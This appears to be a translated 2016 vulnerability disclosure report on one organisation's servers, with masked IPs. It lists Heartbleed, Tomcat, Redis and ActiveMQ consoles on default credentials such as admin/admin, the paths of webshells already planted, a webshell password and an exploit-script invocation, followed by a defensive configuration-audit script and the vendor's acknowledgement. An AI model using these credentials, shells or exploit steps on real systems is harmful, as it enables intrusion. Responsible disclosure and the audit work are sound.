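2016-04-15: Details reported to the vendor; awaiting vendor handling
2016-04-16: Vendor confirmed; details disclosed to the vendor only
2016-04-26: Details disclosed to core white hats and experts in related fields
2016-05-06: Details disclosed to regular white hats
2016-05-16: Details disclosed to intern white hats
2016-05-31: Details disclosed to the public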
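Riddled with holes, piles and piles of shells
Main site OpenSSL Heartbleed + Tomcat weak passwords + a large number of Redis instances open to unauthenticated access; 3 webshells are given.
1. OpenSSL Heartbleed on the main site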
python openssl.py **.**.**.**
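2. Two Tomcat weak passwords leading to getshell
http://**.**.**.**:2348/manager/html
http://**.**.**.**:6118/manager/html
These two ports map to two internal servers, namely: **.**.**.**\**.**.**.**
The password on both is admin/admin.
I found that both had already been worked over by someone before me; I reported as soon as I found them. There are several shells, please check for yourselves.
Shell addresses:
http://**.**.**.**:2348/app/app1.jsp
http://**.**.**.**:6118/iswins/index.jsp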
3. Many Redis instances allow unauthenticated access and can be used to get a shell
One shell as an example: **.**.**.**:8080/redis.php  password: c
IPs involved:
**.**.**.**:7001~4
**.**.**.**:6381
**.**.**.**:7963
**.**.**.**:6380
**.**.**.**:7963
**.**.**.**:7963
**.**.**.**:8063
**.**.**.**:8063
**.**.**.**:8063
With a shell in hand, and since the server above had nmap installed, I did a simple check of which services were open.
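Dozens of hosts serving internal services are alive on the network.
4. A few weak passwords thrown in as a bonus: ActiveMQ
**.**.**.**:8161/admin/
http://**.**.**.**:8161/admin/
**.**.**.**:8161/admin/
Passwords: admin/admin, user/user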
Riddled with holes
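A self-check for the three weak-configuration findings above (Tomcat manager admin/admin, Redis without authentication, ActiveMQ console admin/admin and user/user), added here as an example and not part of the original report. The sample files, the function names and the 12-character minimum are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Tomcat roles that grant access to the manager / host-manager applications.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script", "manager-jmx",
                 "admin", "admin-gui", "admin-script"}

MIN_LEN = 12  # assumed minimum acceptable password length for this audit


def is_weak(user, password):
    """Weak if empty, short, or equal to the account name (admin/admin, user/user)."""
    return len(password) < MIN_LEN or password.lower() == user.lower()


def audit_tomcat_users(xml_text):
    """Flag tomcat-users.xml accounts that can reach /manager with a weak password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # tolerate a namespaced root
            continue
        user = el.get("username") or el.get("name") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if roles & MANAGER_ROLES and is_weak(user, el.get("password", "")):
            findings.append(f"tomcat: '{user}' has manager access with a weak password")
    return findings


def audit_redis_conf(conf_text):
    """Flag a redis.conf that accepts unauthenticated clients from the network."""
    settings = {}
    for line in conf_text.splitlines():
        parts = line.strip().split(None, 1)
        if parts and not parts[0].startswith("#"):
            settings[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    binds = settings.get("bind", "").split()
    loopback_only = bool(binds) and all(
        b.lstrip("-") in ("127.0.0.1", "::1") for b in binds)
    password = settings.get("requirepass", "").strip('"')
    findings = []
    if not password and not loopback_only:
        findings.append("redis: no requirepass and not bound to loopback only")
    if not password and settings.get("protected-mode", "").lower() == "no":
        findings.append("redis: protected-mode disabled without a password")
    if password and is_weak("", password):
        findings.append("redis: requirepass is too short")
    return findings


def audit_jetty_realm(props_text):
    """Flag weak entries in 'user: password, role' lines, the format of the
    jetty-realm.properties file that guards the ActiveMQ web console."""
    findings = []
    for line in props_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, rest = line.split(":", 1)
        password = rest.split(",", 1)[0].strip()
        if is_weak(user.strip(), password):
            findings.append(f"activemq: console user '{user.strip()}' has a weak password")
    return findings


# Constructed sample files modelled on the weak settings named in the report.
TOMCAT_SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="k7#Vq9!xLm2$Zt4p" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="reports"/>
</tomcat-users>"""
REDIS_SAMPLE = "bind 0.0.0.0\nport 6381\nprotected-mode no\n"
REDIS_HARDENED = 'bind 127.0.0.1 -::1\nprotected-mode yes\nrequirepass "constructed-long-random-secret-0001"\n'
ACTIVEMQ_SAMPLE = "admin: admin, admin\nuser: user, user\nops: Xy7!constructedLongPass, admin\n"

if __name__ == "__main__":
    for finding in (audit_tomcat_users(TOMCAT_SAMPLE) + audit_redis_conf(REDIS_SAMPLE)
                    + audit_jetty_realm(ACTIVEMQ_SAMPLE)):
        print(finding)
```

Point the three functions at the real `tomcat-users.xml`, `redis.conf` and `jetty-realm.properties` contents on each host; an empty result from all three means none of the weak settings listed in this report is present in those files.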
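Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-04-16 00:01
Because we did not pay enough attention to the security of our test services, security vulnerabilities were exposed in them, which in turn led to an intrusion affecting production services. Thanks to 路人甲@WooYun and to WooYun for their work.
None yet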